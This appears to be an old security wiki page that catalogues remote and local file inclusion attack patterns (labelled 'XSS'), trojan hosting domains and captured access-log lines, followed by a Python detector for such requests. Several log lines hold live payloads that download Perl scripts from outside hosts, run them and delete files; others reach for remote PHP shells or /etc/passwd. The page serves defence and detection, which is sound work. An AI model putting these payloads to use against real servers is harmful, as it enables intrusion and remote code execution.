Sites with malicious PHP/Perl scripts
Here is a list of sites that host PHP/Perl scripts
used to attack websites (or trojans/worms).
Known (XSS)
/index2.php?x=<site>
/index.php?x=../../../../../../etc/passwd
/main.php?x=<site>
/error.php?dir=<site>
/main.inc&G_PATH=<site>
/htmltonuke.php?filnavn=<site>
/upgrade_album.php?GALLERY_BASEDIR=<site>
&mosConfig_absolute_path=<site>
/admin.php?cal_dir=<site>
/lib.inc.php?pm_path=<site>
/mainfile.php?MAIN_PATH=<site>
/contacts.php?cal_dir=<site>
/include.php?gorumDir=<site>
/step_one_tables.php?server_inc=<site>
/viewgantt.php?root_dir=<site>
/index.php?site=<site>
/index.php?content=<site>
/index.php?content=<any file>
/index.php?visualizar=<site>
/addevent.inc.php?agendax_path=<site>
/displayCategory.php?adminpath=<site>
/theme.php?THEME_DIR=<site>
/vw_usr_roles.php?baseDir=<site>
/initdb.php?absolute_path=<site>
/db.php?path_local=<site>
List of scripts used to attack websites
Worm/virus sites
[Sober trojan] home.arcor.de scifi.pages.at home.pages.at free.pages.at people.freenet.de
[Hotword trojan] ftp.targetdata.biz ftp.alrobertspublishing.com bp007.no-ip.com
[Warg bot] media.pixpond.com/l9rd
This is what the LOGS look like
87.106.75.16 - - [12/Jul/2007:12:48:32 -0300] "GET /wiki/index.php//skin/zero_vote/error.php?dir=http://geocities.yahoo.com.br/google3089/cmd.html?&cmd=cd%20/tmp;lwp-download%20http://tw0team.name/leto/kk.txt;wget%20http://tw0team.name/leto/kk.txt;fetch%20http://tw0team.name/leto/kk.txt;curl%20-O%20http://tw0team.name/leto/kk.txt;perl%20kk.txt;rm%20-rf%20kk*? HTTP/1.1" 200 7024 "-" "libwww-perl/5.803"
213.251.187.110 - - [10/Jul/2007:05:00:57 -0300] "GET /dcid/install/index.php?lng=../../include/main.inc&G_PATH=http://legendlist.altervista.org/stringa.txt? HTTP/1.1" 200 6359 "-" "libwww-perl/5.803"
212.68.197.6 - - [10/Jul/2007:14:29:20 -0300] "GET //index.php?link=http://geocities.yahoo.com.br/google3089/cmd.html?&cmd=cd%20/tmp;lwp-download%20http://tw0team.name/x/bn.txt;wget%20http://tw0team.name/x/bn.txt;fetch%20http://tw0team.name/x/bn.txt;curl%20-O%20http://tw0team.name/x/bn.txt;perl%20bn.txt;rm%20-rf%20bn*? HTTP/1.1" 200 6235 "-" "libwww-perl/5.76"
216.120.227.52 - - [18/Jul/2007:07:55:43 -0300] "GET /dcid/*install/index.php?lng=../../include/main.inc&G_PATH=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 6361 "-" "libwww-perl/5.803"
212.184.187.186 - - [17/Jul/2007:17:28:19 -0300] "GET //install/index.php?lng=../../include/main.inc&G_PATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 200 6235 "-" "libwww-perl/5.63"
208.116.38.148 - - [17/Jul/2007:18:31:13 -0300] "GET //install/index.php?lng=../../include/main.inc&G_PATH=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 200 6235 "-" "libwww-perl/5.79"
201.17.129.24 - - [22/Jul/2007:21:46:26 -0300] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://usuarios.lycos.es/poizonbox/r57.txt?? HTTP/1.1" 200 6349 "-" "libwww-perl/5.803"
69.64.37.77 - - [21/Jul/2007:16:51:25 -0300] "GET /wiki/index.php?title=Samples_of_attac...ed_by_ossec&printable=yes/install/index.php?lng=../../include/main.inc&G_PATH=http://www.visiontech-india.com/articles/images/logo2.jpg? HTTP/1.1" 200 7063 "-" "libwww-perl/5.79"
62.141.39.43 - - [26/Jul/2007:10:14:16 -0300] "GET /wiki/index.php//install/index.php?lng=../../include/main.inc&G_PATH=http://mendesrs.bravehost.com/id.txt? HTTP/1.1" 200 6933 "-" "libwww-perl/5.76"
85.12.31.79 - - [26/Jul/2007:18:13:09 -0300] "GET /wiki/index.php/WebAttacks_links//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7197 "-" "libwww-perl/5.806"
216.120.237.150 - - [26/Jul/2007:19:37:43 -0300] "GET //skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 6235 "-" "libwww-perl/5.806"
66.156.76.235 - - [27/Jul/2007:00:12:18 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7280 "-" "libwww-perl/5.76"
216.120.237.150 - - [28/Jul/2007:22:38:12 -0300] "GET /wiki/index.php//skin/zero_vote/error.php?dir=http://intrusion.altervista.org/r0x/r0x/.../.../.../no.txt?? HTTP/1.1" 200 7010 "-" "libwww-perl/5.806"
62.210.190.242 - - [28/Jul/2007:20:16:23 -0300] "GET /wiki/index.php?title=Index.php&printable=yes/*install/index.php?lng=../../include/main.inc&G_PATH=http://guilde-wow.nuxit.net/main? HTTP/1.1" 200 6762 "-" "libwww-perl/5.803"
216.200.125.254 - - [31/Jul/2007:22:01:12 -0300] "GET /htmltonuke.php?filnavn=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 6291 "-" "libwww-perl/5.75"
216.200.125.254 - - [31/Jul/2007:22:16:20 -0300] "GET /wiki/index.php/htmltonuke.php?filnavn=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 6884 "-" "libwww-perl/5.75"
216.200.125.254 - - [01/Aug/2007:11:12:28 -0300] "GET /wiki/index.php//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../no.txt? HTTP/1.1" 200 7120 "-" "libwww-perl/5.75"
69.14.231.114 - - [01/Aug/2007:18:32:00 -0300] "GET /wiki/index.php/main.php?x=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../rox.txt? HTTP/1.1" 200 6834 "-" "libwww-perl/5.79"
69.14.231.114 - - [01/Aug/2007:22:26:47 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/default.php?page=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../zip.txt? HTTP/1.1" 200 7153 "-" "libwww-perl/5.79"
86.109.164.220 - - [07/Aug/2007:15:01:59 -0300] "GET /wiki/index.php/RFI_Vulnerability_scanner/index.php?p=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 500 607 "-" "libwww-perl/5.79"
74.53.90.130 - - [07/Aug/2007:15:37:44 -0300] "GET /main.php?x=http://ankerz.phpnet.us/Qe3? HTTP/1.1" 500 607 "-" "libwww-perl/5.808"
209.216.253.180 - - [15/Aug/2007:15:47:04 -0300] "GET /dcid/?p=6/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=uid=48(apache)%20gid=48(apache)%20groups=48(apache),500(webadmin),2522(psaserv)%0A? HTTP/1.1" 200 11307 "-" "libwww-perl/5.65"
72.22.90.110 - - [15/Aug/2007:03:31:09 -0300] "GET /wiki/index.php/main.php?page=uid=10004(unix)%20gid=10004(unix)%20groups=10004(unix)%0A? HTTP/1.1" 200 6440 "-" "libwww-perl/5.803"
217.160.21.98 - - [14/Aug/2007:19:55:18 -0300] "GET /wiki/index.php/RFI_%3Cwbr%20/%3EVulnerability_scanner//skin/zero_vote/error.php?dir=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 200 6117 "-" "libwww-perl/5.803"
218.38.19.40 - - [27/Aug/2007:20:07:45 -0300] "GET /ossec-list/2007-April/msg00052.html/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:20:07:02 -0300] "GET /wiki/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
202.67.153.151 - - [26/Aug/2007:21:55:23 -0300] "GET /wiki/admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
202.67.153.151 - - [26/Aug/2007:21:55:22 -0300] "GET /admin.php?cal_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
202.67.153.151 - - [28/Aug/2007:20:48:40 -0300] "GET /wiki/modules/tasks/viewgantt.php?root_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.803"
212.59.7.10 - - [29/Aug/2007:09:37:44 -0300] "GET /wiki/index.php/WebAttacks_links/index.php?lng=../../include/main.inc&G_PATH=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 200 6638 "-" "libwww-perl/5.65"
82.165.33.50 - - [05/Sep/2007:11:44:12 -0300] "GET /main.php?x=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 269 "-" "libwww-perl/5.69"
204.10.70.1 - - [07/Sep/2007:15:54:13 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.colorglo.it/oneadmin/calendar/.r/stringa.txt? HTTP/1.1" 200 6539 "-" "libwww-perl/5.65"
206.176.210.52 - - [07/Sep/2007:14:21:22 -0300] "GET /wiki/index.php/index.php?site=http://www.jungo8949.co.kr/tool25.txt?&cmd=cd%20/tmp;rm%20-rf%20*;cd%20/tmp;lwp-download%20http://triangle-uiuc.org/attack/zero.txt;fetch%20http://triangle-uiuc.org/attack/zero.txt;curl%20-o%20zero.txt%20http://triangle-uiuc.org/attack/zero.txt;wget%20http://triangle-uiuc.org/attack/zero.txt;perl%20zero.txt? HTTP/1.1" 200 6272 "-" "libwww-perl/5.65"
128.241.236.252 - - [09/Sep/2007:13:16:29 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.athleticbaby.com/public/templates_c/paged.gif? HTTP/1.1" 200 6539 "-" "libwww-perl/5.808"
128.241.236.252 - - [09/Sep/2007:13:28:33 -0300] "GET /wiki/index.php/OSSECWUI:Install/install/index.php?lng=../../include/main.inc&G_PATH=http://www.athleticbaby.com/public/templates_c/paged.gif? HTTP/1.1" 200 6726 "-" "libwww-perl/5.808"
209.240.96.35 - - [17/Sep/2007:13:51:52 -0300] "GET /wiki/index.php?content=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 11992 "-" "libwww-perl/5.805"
200.142.86.12 - - [14/Sep/2007:12:36:42 -0300] "GET /wiki/index.php//modules/agendax/addevent.inc.php?agendax_path=http://intrusion.hut2.ru/.../.../.../metodi.txt?? HTTP/1.1" 200 6704 "-" "libwww-perl/5.65"
81.169.128.26 - - [03/Oct/2007:03:44:22 -0300] "GET /wiki/index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 11992 "-" "libwww-perl/5.69"
210.114.220.92 - - [04/Oct/2007:00:29:38 -0300] "GET /wiki/index.php/install/index.php?lng=../../include/main.inc&G_PATH=http://www.onlinebusan.com/user_img/gmaw0121/id.txt? HTTP/1.1" 200 6539 "-" "libwww-perl/5.79"
202.133.244.140 - - [18/Sep/2007:17:08:46 -0300] "GET /wiki/index.php//hpgprojects/modules/admin/vw_usr_roles.php?baseDir='http://www.mk-design.com.tw/phpMyVisites/safe.txt? HTTP/1.1" 200 6814 "-" "libwww-perl/5.79"
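The request shapes in the log entries above (a URL passed as a parameter value, long ../ chains, id output pasted into a parameter) can be matched mechanically when reviewing an access log. The Python below is an added example, not part of the original page or of any tool it names; the sample lines are constructed (documentation IP ranges, the placeholder host attacker.example) and the names classify and scan are chosen here.

```python
import re
from urllib.parse import unquote
# Apache combined format: ip - - [time] "METHOD target PROTO" status size "ref" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>.*) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$')
# A parameter whose value is itself a URL (optionally quoted), e.g. ?dir=http://...
REMOTE_VALUE = re.compile(r'[?&][\w.\[\]-]+=\s*[\'"]?(?:https?|ftp)://', re.I)
# Two or more ../ segments once the target has been URL-decoded.
TRAVERSAL = re.compile(r'(?:\.\./){2,}')
# Output of the id command sitting in a parameter, as in the uid=48(apache) entries.
ID_OUTPUT = re.compile(r'=uid=\d+\([^)]*\)\s*gid=\d+')
# Constructed sample lines (documentation IP ranges, placeholder host names).
SAMPLE = [
    '192.0.2.10 - - [12/Jul/2007:12:48:32 -0300] "GET /skin/zero_vote/error.php'
    '?dir=http://attacker.example/cmd.txt? HTTP/1.1" 200 7024 "-" "libwww-perl/5.803"',
    '192.0.2.11 - - [17/Sep/2007:13:51:52 -0300] "GET /index.php'
    '?content=..%2F..%2F..%2F..%2Fetc/passwd HTTP/1.1" 200 11992 "-" "libwww-perl/5.805"',
    '192.0.2.12 - - [15/Aug/2007:03:31:09 -0300] "GET /main.php'
    '?page=uid=10004(unix)%20gid=10004(unix)%0A? HTTP/1.1" 404 286 "-" "libwww-perl/5.803"',
    '198.51.100.7 - - [15/Aug/2007:03:32:00 -0300] "GET /index.php'
    '?title=Main_Page HTTP/1.1" 200 5120 "http://www.example.org/" "Mozilla/5.0"',
]

def classify(line):
    """Return (ip, status, reasons) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    target = unquote(m.group('target'))  # decode %2F, %20 and so on before matching
    reasons = []
    if REMOTE_VALUE.search(target):
        reasons.append('remote-url-in-parameter')
    if TRAVERSAL.search(target):
        reasons.append('path-traversal')
    if ID_OUTPUT.search(target):
        reasons.append('id-output-in-parameter')
    # The user agent alone is weak evidence, so it only annotates an existing hit.
    if reasons and m.group('agent').lower().startswith('libwww-perl'):
        reasons.append('scripted-client')
    return m.group('ip'), int(m.group('status')), reasons

def scan(lines):
    """Return the classify() results that carry at least one reason."""
    return [r for r in map(classify, lines) if r and r[2]]

if __name__ == '__main__':
    for ip, status, reasons in scan(SAMPLE):
        print(ip, status, ','.join(reasons))
```

A 200 status in the result does not by itself mean the include succeeded, since an application that serves a page for any path under index.php answers 200 either way. Legitimate parameters that carry URLs (redirect or return-to fields) also match the first rule and need an allow-list.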